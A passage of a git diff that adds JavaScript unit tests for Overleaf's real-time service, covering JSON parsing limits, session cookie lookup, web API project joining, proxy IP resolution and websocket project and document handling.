.calledWithExactly(this.other_doc_id) + .should.equal(true) + }) + + it('should leave the project', function () { + return this.client.leave + .calledWithExactly(this.project_id) + .should.equal(true) + }) + + return it('should not emit any events', function () { + return this.RoomEvents.emit.called.should.equal(false) + }) + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/SafeJsonParseTest.js b/services/real-time/test/unit/js/SafeJsonParseTest.js new file mode 100644 index 0000000..e5712fc --- /dev/null +++ b/services/real-time/test/unit/js/SafeJsonParseTest.js @@ -0,0 +1,55 @@ +/* eslint-disable + no-return-assign, + no-useless-escape, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') +const SandboxedModule = require('sandboxed-module') +const modulePath = '../../../app/js/SafeJsonParse' + +describe('SafeJsonParse', function () { + beforeEach(function () { + return (this.SafeJsonParse = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.Settings = { + maxUpdateSize: 16 * 1024, + }), + }, + })) + }) + + return describe('parse', function () { + it('should parse documents correctly', function (done) { + return this.SafeJsonParse.parse('{"foo": "bar"}', (error, parsed) => { + if (error) return done(error) + expect(parsed).to.deep.equal({ foo: 'bar' }) + return done() + }) + }) + + it('should return an error on bad data', function (done) { + return this.SafeJsonParse.parse('blah', (error, parsed) => { + expect(error).to.exist + return done() + }) + }) + + return it('should return an error on oversized data', function (done) { + // we have a 2k overhead on top of max size + const bigBlob = Array(16 * 1024).join('A') + const data = `{\"foo\": \"${bigBlob}\"}` + this.Settings.maxUpdateSize = 2 * 1024 + return this.SafeJsonParse.parse(data, (error, parsed) => { + this.logger.error.called.should.equal(false) + expect(error).to.exist + return done() + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/SessionSocketsTests.js b/services/real-time/test/unit/js/SessionSocketsTests.js new file mode 100644 index 0000000..c2a9ad3 --- /dev/null +++ b/services/real-time/test/unit/js/SessionSocketsTests.js @@ -0,0 +1,280 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { EventEmitter } = require('node:events') +const { expect } = require('chai') +const SandboxedModule = require('sandboxed-module') +const modulePath = '../../../app/js/SessionSockets' +const sinon = require('sinon') + +describe('SessionSockets', function () { + beforeEach(function () { + this.metrics = { inc: sinon.stub() } + this.SessionSocketsModule = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/metrics': this.metrics, + }, + }) + this.io = new EventEmitter() + this.id1 = Math.random().toString() + this.id2 = Math.random().toString() + const redisResponses = { + error: [new Error('Redis: something went wrong'), null], + unknownId: [null, null], + } + redisResponses[this.id1] = [null, { user: { _id: '123' } }] + redisResponses[this.id2] = [null, { user: { _id: 'abc' } }] + + this.sessionStore = { + get: sinon + .stub() + .callsFake((id, fn) => fn.apply(null, redisResponses[id])), + } + this.cookieParser = function (req, res, next) { + req.signedCookies = req._signedCookies + return next() + } + this.SessionSockets = this.SessionSocketsModule( + this.io, + this.sessionStore, + this.cookieParser, + 'ol.sid' + ) + return (this.checkSocket = (socket, fn) => { + this.SessionSockets.once('connection', fn) + return this.io.emit('connection', socket) + }) + }) + + describe('without cookies', function () { + beforeEach(function () { + return (this.socket = { handshake: {} }) + }) + + it('should return a lookup error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.exist + expect(error.message).to.equal('could not look up session by key') + return done() + }) + }) + + it('should not query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(false) + return done() + }) + }) + + it('should increment the session.cookie metric with status "none"', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.metrics.inc).to.be.calledWith('session.cookie', 1, { + status: 'none', + }) + return done() + }) + }) + }) + + describe('with a different cookie', function () { + beforeEach(function () { + return (this.socket = { handshake: { _signedCookies: { other: 1 } } }) + }) + + it('should return a lookup error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.exist + expect(error.message).to.equal('could not look up session by key') + return done() + }) + }) + + it('should not query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(false) + return done() + }) + }) + }) + + describe('with a cookie with an invalid signature', function () { + beforeEach(function () { + return (this.socket = { + handshake: { _signedCookies: { 'ol.sid': false } }, + }) + }) + + it('should return a lookup error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.exist + expect(error.message).to.equal('could not look up session by key') + return done() + }) + }) + + it('should not query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(false) + return done() + }) + }) + + it('should increment the session.cookie metric with status=bad-signature', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.metrics.inc).to.be.calledWith('session.cookie', 1, { + status: 'bad-signature', + }) + return done() + }) + }) + }) + + describe('with a valid cookie and a failing session lookup', function () { + beforeEach(function () { + return (this.socket = { + handshake: { _signedCookies: { 'ol.sid': 'error' } }, + }) + }) + + it('should query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(true) + return done() + }) + }) + + it('should return a redis error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.exist + expect(error.message).to.equal('Redis: something went wrong') + return done() + }) + }) + + it('should increment the session.cookie metric with status=error', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.metrics.inc).to.be.calledWith('session.cookie', 1, { + status: 'error', + }) + return done() + }) + }) + }) + + describe('with a valid cookie and no matching session', function () { + beforeEach(function () { + return (this.socket = { + handshake: { _signedCookies: { 'ol.sid': 'unknownId' } }, + }) + }) + + it('should query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(true) + return done() + }) + }) + + it('should return a lookup error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.exist + expect(error.message).to.equal('could not look up session by key') + return done() + }) + }) + + it('should increment the session.cookie metric with status=missing', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.metrics.inc).to.be.calledWith('session.cookie', 1, { + status: 'missing', + }) + return done() + }) + }) + }) + + describe('with a valid cookie and a matching session', function () { + beforeEach(function () { + return (this.socket = { + handshake: { _signedCookies: { 'ol.sid': this.id1 } }, + }) + }) + + it('should query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(true) + return done() + }) + }) + + it('should not return an error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.not.exist + return done() + }) + }) + + it('should return the session', function (done) { + return this.checkSocket(this.socket, (error, s, session) => { + if (error) return done(error) + expect(session).to.deep.equal({ user: { _id: '123' } }) + return done() + }) + }) + + it('should increment the session.cookie metric with status=signed', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.metrics.inc).to.be.calledWith('session.cookie', 1, { + status: 'signed', + }) + return done() + }) + }) + }) + + describe('with a different valid cookie and matching session', function () { + beforeEach(function () { + return (this.socket = { + handshake: { _signedCookies: { 'ol.sid': this.id2 } }, + }) + }) + + it('should query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(true) + return done() + }) + }) + + it('should not return an error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.not.exist + return done() + }) + }) + + it('should return the other session', function (done) { + return this.checkSocket(this.socket, (error, s, session) => { + if (error) return done(error) + expect(session).to.deep.equal({ user: { _id: 'abc' } }) + return done() + }) + }) + + it('should increment the session.cookie metric with status=error', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.metrics.inc).to.be.calledWith('session.cookie', 1, { + status: 'signed', + }) + return done() + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/WebApiManagerTests.js b/services/real-time/test/unit/js/WebApiManagerTests.js new file mode 100644 index 0000000..b68661c --- /dev/null +++ b/services/real-time/test/unit/js/WebApiManagerTests.js @@ -0,0 +1,268 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../app/js/WebApiManager.js' +const SandboxedModule = require('sandboxed-module') +const { CodedError } = require('../../../app/js/Errors') + +describe('WebApiManager', function () { + beforeEach(function () { + this.project_id = 'project-id-123' + this.user_id = 'user-id-123' + this.user = { _id: this.user_id } + this.callback = sinon.stub() + return (this.WebApiManager = SandboxedModule.require(modulePath, { + requires: { + request: (this.request = {}), + '@overleaf/settings': (this.settings = { + apis: { + web: { + url: 'http://web.example.com', + user: 'username', + pass: 'password', + }, + }, + }), + }, + })) + }) + + return describe('joinProject', function () { + describe('successfully', function () { + beforeEach(function () { + this.response = { + project: { name: 'Test project' }, + privilegeLevel: 'owner', + isRestrictedUser: true, + isTokenMember: true, + isInvitedMember: true, + } + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 200 }, this.response) + return this.WebApiManager.joinProject( + this.project_id, + this.user, + this.callback + ) + }) + + it('should send a request to web to join the project', function () { + return this.request.post + .calledWith({ + url: `${this.settings.apis.web.url}/project/${this.project_id}/join`, + auth: { + user: this.settings.apis.web.user, + pass: this.settings.apis.web.pass, + sendImmediately: true, + }, + json: { + userId: this.user_id, + anonymousAccessToken: undefined, + }, + jar: false, + }) + .should.equal(true) + }) + + return it('should return the project, privilegeLevel, and restricted flag', function () { + return this.callback + .calledWith( + null, + this.response.project, + this.response.privilegeLevel, + { + isRestrictedUser: this.response.isRestrictedUser, + isTokenMember: this.response.isTokenMember, + isInvitedMember: this.response.isInvitedMember, + } + ) + .should.equal(true) + }) + }) + + describe('with anon user', function () { + beforeEach(function () { + this.user_id = 'anonymous-user' + this.token = 'a-ro-token' + this.user = { + _id: this.user_id, + anonymousAccessToken: this.token, + } + this.response = { + project: { name: 'Test project' }, + privilegeLevel: 'readOnly', + isRestrictedUser: true, + isTokenMember: false, + isInvitedMember: false, + } + this.request.post = sinon + .stub() + .yields(null, { statusCode: 200 }, this.response) + this.WebApiManager.joinProject( + this.project_id, + this.user, + this.callback + ) + }) + + it('should send a request to web to join the project', function () { + this.request.post.should.have.been.calledWith({ + url: `${this.settings.apis.web.url}/project/${this.project_id}/join`, + auth: { + user: this.settings.apis.web.user, + pass: this.settings.apis.web.pass, + sendImmediately: true, + }, + json: { + userId: this.user_id, + anonymousAccessToken: this.token, + }, + jar: false, + }) + }) + + it('should return the project, privilegeLevel, and restricted flag', function () { + this.callback.should.have.been.calledWith( + null, + this.response.project, + this.response.privilegeLevel, + { + isRestrictedUser: this.response.isRestrictedUser, + isTokenMember: this.response.isTokenMember, + isInvitedMember: this.response.isInvitedMember, + } + ) + }) + }) + + describe('when web replies with a 403', function () { + beforeEach(function () { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 403 }, null) + this.WebApiManager.joinProject( + this.project_id, + this.user_id, + this.callback + ) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith( + sinon.match({ + message: 'not authorized', + }) + ) + .should.equal(true) + }) + }) + + describe('when web replies with a 404', function () { + beforeEach(function () { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 404 }, null) + this.WebApiManager.joinProject( + this.project_id, + this.user_id, + this.callback + ) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith( + sinon.match({ + message: 'project not found', + info: { code: 'ProjectNotFound' }, + }) + ) + .should.equal(true) + }) + }) + + describe('with an error from web', function () { + beforeEach(function () { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 500 }, null) + return this.WebApiManager.joinProject( + this.project_id, + this.user_id, + this.callback + ) + }) + + return it('should call the callback with an error', function () { + return this.callback + .calledWith( + sinon.match({ + message: 'non-success status code from web', + info: { statusCode: 500 }, + }) + ) + .should.equal(true) + }) + }) + + describe('with no data from web', function () { + beforeEach(function () { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 200 }, null) + return this.WebApiManager.joinProject( + this.project_id, + this.user_id, + this.callback + ) + }) + + return it('should call the callback with an error', function () { + return this.callback + .calledWith( + sinon.match({ + message: 'no data returned from joinProject request', + }) + ) + .should.equal(true) + }) + }) + + return describe('when the project is over its rate limit', function () { + beforeEach(function () { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 429 }, null) + return this.WebApiManager.joinProject( + this.project_id, + this.user_id, + this.callback + ) + }) + + return it('should call the callback with a TooManyRequests error code', function () { + return this.callback + .calledWith( + sinon.match({ + message: 'rate-limit hit when joining project', + info: { + code: 'TooManyRequests', + }, + }) + ) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/WebsocketAddressManagerTests.js b/services/real-time/test/unit/js/WebsocketAddressManagerTests.js new file mode 100644 index 0000000..89d4598 --- /dev/null +++ b/services/real-time/test/unit/js/WebsocketAddressManagerTests.js @@ -0,0 +1,100 @@ +const SandboxedModule = require('sandboxed-module') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/WebsocketAddressManager' +) + +describe('WebsocketAddressManager', function () { + beforeEach(function () { + this.WebsocketAddressManager = SandboxedModule.require(modulePath, { + requires: {}, + }) + }) + + describe('with a proxy configuration', function () { + beforeEach(function () { + this.websocketAddressManager = new this.WebsocketAddressManager( + true, + '127.0.0.1' + ) + }) + + it('should return the client ip address when behind a proxy', function () { + expect( + this.websocketAddressManager.getRemoteIp({ + headers: { + 'x-forwarded-proto': 'https', + 'x-forwarded-for': '123.45.67.89', + }, + address: { address: '127.0.0.1' }, + }) + ).to.equal('123.45.67.89') + }) + + it('should return the client ip address for a direct connection', function () { + expect( + this.websocketAddressManager.getRemoteIp({ + headers: {}, + address: { address: '123.45.67.89' }, + }) + ).to.equal('123.45.67.89') + }) + + it('should return the client ip address when there are no headers in the handshake', function () { + expect( + this.websocketAddressManager.getRemoteIp({ + address: { address: '123.45.67.89' }, + }) + ).to.equal('123.45.67.89') + }) + + it('should return a "client-handshake-missing" response when the handshake is missing', function () { + expect(this.websocketAddressManager.getRemoteIp()).to.equal( + 'client-handshake-missing' + ) + }) + }) + + describe('without a proxy configuration', function () { + beforeEach(function () { + this.websocketAddressManager = new this.WebsocketAddressManager(false) + }) + + it('should return the client ip address for a direct connection', function () { + expect( + this.websocketAddressManager.getRemoteIp({ + headers: {}, + address: { address: '123.45.67.89' }, + }) + ).to.equal('123.45.67.89') + }) + + it('should return undefined if the client ip address is not present', function () { + expect( + this.websocketAddressManager.getRemoteIp({ + headers: {}, + address: { otherAddressProperty: '123.45.67.89' }, + }) + ).to.be.undefined + }) + + it('should return the proxy ip address if there is actually a proxy', function () { + expect( + this.websocketAddressManager.getRemoteIp({ + headers: { + 'x-forwarded-proto': 'https', + 'x-forwarded-for': '123.45.67.89', + }, + address: { address: '127.0.0.1' }, + }) + ).to.equal('127.0.0.1') + }) + + it('should return a "client-handshake-missing" response when the handshake is missing', function () { + expect(this.websocketAddressManager.getRemoteIp()).to.equal( + 'client-handshake-missing' + ) + }) + }) +}) diff --git a/services/real-time/test/unit/js/WebsocketControllerTests.js b/services/real-time/test/unit/js/WebsocketControllerTests.js new file mode 100644 index 0000000..1f3ca67 --- /dev/null +++ b/services/real-time/test/unit/js/WebsocketControllerTests.js @@ -0,0 +1,1698 @@ +/* eslint-disable + no-return-assign, + no-throw-literal, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../app/js/WebsocketController.js' +const SandboxedModule = require('sandboxed-module') +const tk = require('timekeeper') +const { UpdateTooLargeError } = require('../../../app/js/Errors') + +describe('WebsocketController', function () { + beforeEach(function () { + tk.freeze(new Date()) + this.project_id = 'project-id-123' + this.user = { + _id: (this.user_id = 'user-id-123'), + first_name: 'James', + last_name: 'Allen', + email: 'james@example.com', + signUpDate: new Date('2014-01-01'), + loginCount: 42, + } + this.callback = sinon.stub() + this.client = { + disconnected: false, + id: (this.client_id = 'mock-client-id-123'), + publicId: `other-id-${Math.random()}`, + ol_context: {}, + joinLeaveEpoch: 0, + join: sinon.stub(), + leave: sinon.stub(), + } + return (this.WebsocketController = SandboxedModule.require(modulePath, { + requires: { + './WebApiManager': (this.WebApiManager = {}), + './AuthorizationManager': (this.AuthorizationManager = {}), + './DocumentUpdaterManager': (this.DocumentUpdaterManager = {}), + './ConnectedUsersManager': (this.ConnectedUsersManager = {}), + './WebsocketLoadBalancer': (this.WebsocketLoadBalancer = {}), + '@overleaf/metrics': (this.metrics = { + inc: sinon.stub(), + set: sinon.stub(), + }), + './RoomManager': (this.RoomManager = {}), + }, + })) + }) + + afterEach(function () { + return tk.reset() + }) + + describe('joinProject', function () { + describe('when authorised', function () { + beforeEach(function () { + this.client.id = 'mock-client-id' + this.project = { + name: 'Test Project', + owner: { + _id: (this.owner_id = 'mock-owner-id-123'), + }, + } + this.privilegeLevel = 'owner' + this.ConnectedUsersManager.updateUserPosition = sinon + .stub() + .callsArgAsync(4) + this.isRestrictedUser = true + this.isTokenMember = true + this.isInvitedMember = true + this.WebApiManager.joinProject = sinon + .stub() + .callsArgWith(2, null, this.project, this.privilegeLevel, { + isRestrictedUser: this.isRestrictedUser, + isTokenMember: this.isTokenMember, + isInvitedMember: this.isInvitedMember, + }) + this.RoomManager.joinProject = sinon.stub().callsArg(2) + return this.WebsocketController.joinProject( + this.client, + this.user, + this.project_id, + this.callback + ) + }) + + it('should load the project from web', function () { + return this.WebApiManager.joinProject + .calledWith(this.project_id, this.user) + .should.equal(true) + }) + + it('should join the project room', function () { + return this.RoomManager.joinProject + .calledWith(this.client, this.project_id) + .should.equal(true) + }) + + it('should set the privilege level on the client', function () { + return this.client.ol_context.privilege_level.should.equal( + this.privilegeLevel + ) + }) + it("should set the user's id on the client", function () { + return this.client.ol_context.user_id.should.equal(this.user._id) + }) + it("should set the user's email on the client", function () { + return this.client.ol_context.email.should.equal(this.user.email) + }) + it("should set the user's first_name on the client", function () { + return this.client.ol_context.first_name.should.equal( + this.user.first_name + ) + }) + it("should set the user's last_name on the client", function () { + return this.client.ol_context.last_name.should.equal( + this.user.last_name + ) + }) + it("should set the user's sign up date on the client", function () { + return this.client.ol_context.signup_date.should.equal( + this.user.signUpDate + ) + }) + it("should set the user's login_count on the client", function () { + return this.client.ol_context.login_count.should.equal( + this.user.loginCount + ) + }) + it('should set the connected time on the client', function () { + return this.client.ol_context.connected_time.should.equal(new Date()) + }) + it('should set the project_id on the client', function () { + return this.client.ol_context.project_id.should.equal(this.project_id) + }) + it('should set the project owner id on the client', function () { + return this.client.ol_context.owner_id.should.equal(this.owner_id) + }) + it('should set the is_restricted_user flag on the client', function () { + return this.client.ol_context.is_restricted_user.should.equal( + this.isRestrictedUser + ) + }) + it('should set the is_token_member flag on the client', function () { + this.client.ol_context.is_token_member.should.equal(this.isTokenMember) + }) + it('should set the is_invited_member flag on the client', function () { + this.client.ol_context.is_invited_member.should.equal( + this.isInvitedMember + ) + }) + it('should call the callback with the project, privilegeLevel and protocolVersion', function () { + return this.callback + .calledWith( + null, + this.project, + this.privilegeLevel, + this.WebsocketController.PROTOCOL_VERSION + ) + .should.equal(true) + }) + + it('should mark the user as connected in ConnectedUsersManager', function () { + return this.ConnectedUsersManager.updateUserPosition + .calledWith(this.project_id, this.client.publicId, this.user, null) + .should.equal(true) + }) + + return it('should increment the join-project metric', function () { + return this.metrics.inc + .calledWith('editor.join-project') + .should.equal(true) + }) + }) + + describe('when not authorized', function () { + beforeEach(function () { + this.WebApiManager.joinProject = sinon + .stub() + .callsArgWith(2, null, null, null) + return this.WebsocketController.joinProject( + this.client, + this.user, + this.project_id, + this.callback + ) + }) + + it('should return an error', function () { + return this.callback + .calledWith(sinon.match({ message: 'not authorized' })) + .should.equal(true) + }) + + return it('should not log an error', function () { + return this.logger.error.called.should.equal(false) + }) + }) + + describe('when the subscribe failed', function () { + beforeEach(function () { + this.client.id = 'mock-client-id' + this.project = { + name: 'Test Project', + owner: { + _id: (this.owner_id = 'mock-owner-id-123'), + }, + } + this.privilegeLevel = 'owner' + this.ConnectedUsersManager.updateUserPosition = sinon + .stub() + .callsArgAsync(4) + this.isRestrictedUser = true + this.isTokenMember = true + this.isInvitedMember = true + this.WebApiManager.joinProject = sinon + .stub() + .callsArgWith(2, null, this.project, this.privilegeLevel, { + isRestrictedUser: this.isRestrictedUser, + isTokenMember: this.isTokenMember, + isInvitedMember: this.isInvitedMember, + }) + this.RoomManager.joinProject = sinon + .stub() + .callsArgWith(2, new Error('subscribe failed')) + return this.WebsocketController.joinProject( + this.client, + this.user, + this.project_id, + this.callback + ) + }) + + return it('should return an error', function () { + this.callback + .calledWith(sinon.match({ message: 'subscribe failed' })) + .should.equal(true) + return this.callback.args[0][0].message.should.equal('subscribe failed') + }) + }) + + describe('when the client has disconnected', function () { + beforeEach(function () { + this.client.disconnected = true + this.WebApiManager.joinProject = sinon.stub().callsArg(2) + return this.WebsocketController.joinProject( + this.client, + this.user, + this.project_id, + this.callback + ) + }) + + it('should not call WebApiManager.joinProject', function () { + return expect(this.WebApiManager.joinProject.called).to.equal(false) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + return it('should increment the editor.join-project.disconnected metric with a status', function () { + return expect( + this.metrics.inc.calledWith('editor.join-project.disconnected', 1, { + status: 'immediately', + }) + ).to.equal(true) + }) + }) + + return describe('when the client disconnects while WebApiManager.joinProject is running', function () { + beforeEach(function () { + this.WebApiManager.joinProject = (project, user, cb) => { + this.client.disconnected = true + return cb(null, this.project, this.privilegeLevel, { + isRestrictedUser: this.isRestrictedUser, + isTokenMember: this.isTokenMember, + isInvitedMember: this.isInvitedMember, + }) + } + + return this.WebsocketController.joinProject( + this.client, + this.user, + this.project_id, + this.callback + ) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + return it('should increment the editor.join-project.disconnected metric with a status', function () { + return expect( + this.metrics.inc.calledWith('editor.join-project.disconnected', 1, { + status: 'after-web-api-call', + }) + ).to.equal(true) + }) + }) + }) + + describe('leaveProject', function () { + beforeEach(function () { + this.DocumentUpdaterManager.flushProjectToMongoAndDelete = sinon + .stub() + .callsArg(1) + this.ConnectedUsersManager.markUserAsDisconnected = sinon + .stub() + .callsArg(2) + this.WebsocketLoadBalancer.emitToRoom = sinon.stub() + this.RoomManager.leaveProjectAndDocs = sinon.stub() + this.clientsInRoom = [] + this.io = { + sockets: { + clients: roomId => { + if (roomId !== this.project_id) { + throw 'expected room_id to be project_id' + } + return this.clientsInRoom + }, + }, + } + this.client.ol_context.project_id = this.project_id + this.client.ol_context.user_id = this.user_id + this.WebsocketController.FLUSH_IF_EMPTY_DELAY = 0 + return tk.reset() + }) // Allow setTimeout to work. + + describe('when the client did not joined a project yet', function () { + beforeEach(function (done) { + this.client.ol_context = {} + return this.WebsocketController.leaveProject(this.io, this.client, done) + }) + + it('should bail out when calling leaveProject', function () { + this.WebsocketLoadBalancer.emitToRoom.called.should.equal(false) + this.RoomManager.leaveProjectAndDocs.called.should.equal(false) + return this.ConnectedUsersManager.markUserAsDisconnected.called.should.equal( + false + ) + }) + + return it('should not inc any metric', function () { + return this.metrics.inc.called.should.equal(false) + }) + }) + + describe('when the project is empty', function () { + beforeEach(function (done) { + this.clientsInRoom = [] + return this.WebsocketController.leaveProject(this.io, this.client, done) + }) + + it('should end clientTracking.clientDisconnected to the project room', function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith( + this.project_id, + 'clientTracking.clientDisconnected', + this.client.publicId + ) + .should.equal(true) + }) + + it('should mark the user as disconnected', function () { + return this.ConnectedUsersManager.markUserAsDisconnected + .calledWith(this.project_id, this.client.publicId) + .should.equal(true) + }) + + it('should flush the project in the document updater', function () { + return this.DocumentUpdaterManager.flushProjectToMongoAndDelete + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should increment the leave-project metric', function () { + return this.metrics.inc + .calledWith('editor.leave-project') + .should.equal(true) + }) + + return it('should track the disconnection in RoomManager', function () { + return this.RoomManager.leaveProjectAndDocs + .calledWith(this.client) + .should.equal(true) + }) + }) + + describe('when the project is not empty', function () { + beforeEach(function (done) { + this.clientsInRoom = ['mock-remaining-client'] + this.io = { + sockets: { + clients: roomId => { + if (roomId !== this.project_id) { + throw 'expected room_id to be project_id' + } + return this.clientsInRoom + }, + }, + } + return this.WebsocketController.leaveProject(this.io, this.client, done) + }) + + return it('should not flush the project in the document updater', function () { + return this.DocumentUpdaterManager.flushProjectToMongoAndDelete.called.should.equal( + false + ) + }) + }) + + describe('when client has not authenticated', function () { + beforeEach(function (done) { + this.client.ol_context.user_id = null + this.client.ol_context.project_id = null + return this.WebsocketController.leaveProject(this.io, this.client, done) + }) + + it('should not end clientTracking.clientDisconnected to the project room', function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith( + this.project_id, + 'clientTracking.clientDisconnected', + this.client.publicId + ) + .should.equal(false) + }) + + it('should not mark the user as disconnected', function () { + return this.ConnectedUsersManager.markUserAsDisconnected + .calledWith(this.project_id, this.client.publicId) + .should.equal(false) + }) + + it('should not flush the project in the document updater', function () { + return this.DocumentUpdaterManager.flushProjectToMongoAndDelete + .calledWith(this.project_id) + .should.equal(false) + }) + + return it('should not increment the leave-project metric', function () { + return this.metrics.inc + .calledWith('editor.leave-project') + .should.equal(false) + }) + }) + + return describe('when client has not joined a project', function () { + beforeEach(function (done) { + this.client.ol_context.user_id = this.user_id + this.client.ol_context.project_id = null + return this.WebsocketController.leaveProject(this.io, this.client, done) + }) + + it('should not end clientTracking.clientDisconnected to the project room', function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith( + this.project_id, + 'clientTracking.clientDisconnected', + this.client.publicId + ) + .should.equal(false) + }) + + it('should not mark the user as disconnected', function () { + return this.ConnectedUsersManager.markUserAsDisconnected + .calledWith(this.project_id, this.client.publicId) + .should.equal(false) + }) + + it('should not flush the project in the document updater', function () { + return this.DocumentUpdaterManager.flushProjectToMongoAndDelete + .calledWith(this.project_id) + .should.equal(false) + }) + + return it('should not increment the leave-project metric', function () { + return this.metrics.inc + .calledWith('editor.leave-project') + .should.equal(false) + }) + }) + }) + + describe('joinDoc', function () { + beforeEach(function () { + this.doc_id = 'doc-id-123' + this.doc_lines = ['doc', 'lines'] + this.version = 42 + this.ops = ['mock', 'ops'] + this.ranges = { mock: 'ranges' } + this.options = {} + + this.client.ol_context.project_id = this.project_id + this.client.ol_context.is_restricted_user = false + this.AuthorizationManager.addAccessToDoc = sinon.stub().yields() + this.AuthorizationManager.assertClientCanViewProject = sinon + .stub() + .callsArgWith(1, null) + this.AuthorizationManager.assertClientCanViewProjectAndDoc = sinon + .stub() + .callsArgWith(2, null) + this.DocumentUpdaterManager.getDocument = sinon + .stub() + .callsArgWith( + 3, + null, + this.doc_lines, + this.version, + this.ranges, + this.ops + ) + return (this.RoomManager.joinDoc = sinon.stub().callsArg(2)) + }) + + describe('works', function () { + beforeEach(function () { + return this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + this.callback + ) + }) + + it('should inc the joinLeaveEpoch', function () { + expect(this.client.joinLeaveEpoch).to.equal(1) + }) + + it('should check that the client is authorized to view the project', function () { + return this.AuthorizationManager.assertClientCanViewProject + .calledWith(this.client) + .should.equal(true) + }) + + it('should get the document from the DocumentUpdaterManager with fromVersion', function () { + return this.DocumentUpdaterManager.getDocument + .calledWith(this.project_id, this.doc_id, -1) + .should.equal(true) + }) + + it('should add permissions for the client to access the doc', function () { + return this.AuthorizationManager.addAccessToDoc + .calledWith(this.client, this.doc_id) + .should.equal(true) + }) + + it('should join the client to room for the doc_id', function () { + return this.RoomManager.joinDoc + .calledWith(this.client, this.doc_id) + .should.equal(true) + }) + + it('should call the callback with the lines, version, ranges and ops', function () { + return this.callback + .calledWith(null, this.doc_lines, this.version, this.ops, this.ranges) + .should.equal(true) + }) + + return it('should increment the join-doc metric', function () { + return this.metrics.inc.calledWith('editor.join-doc').should.equal(true) + }) + }) + + describe('with a fromVersion', function () { + beforeEach(function () { + this.fromVersion = 40 + return this.WebsocketController.joinDoc( + this.client, + this.doc_id, + this.fromVersion, + this.options, + this.callback + ) + }) + + return it('should get the document from the DocumentUpdaterManager with fromVersion', function () { + return this.DocumentUpdaterManager.getDocument + .calledWith(this.project_id, this.doc_id, this.fromVersion) + .should.equal(true) + }) + }) + + describe('with doclines that need escaping', function () { + beforeEach(function () { + this.doc_lines.push(['räksmörgås']) + return this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + this.callback + ) + }) + + return it('should call the callback with the escaped lines', function () { + const escapedLines = this.callback.args[0][1] + const escapedWord = escapedLines.pop() + escapedWord.should.equal('räksmörgÃ¥s') + // Check that unescaping works + return decodeURIComponent(escape(escapedWord)).should.equal( + 'räksmörgås' + ) + }) + }) + + describe('with comments that need encoding', function () { + beforeEach(function () { + this.ranges.comments = [{ op: { c: 'räksmörgås' } }] + return this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + { encodeRanges: true }, + this.callback + ) + }) + + return it('should call the callback with the encoded comment', function () { + const encodedComments = 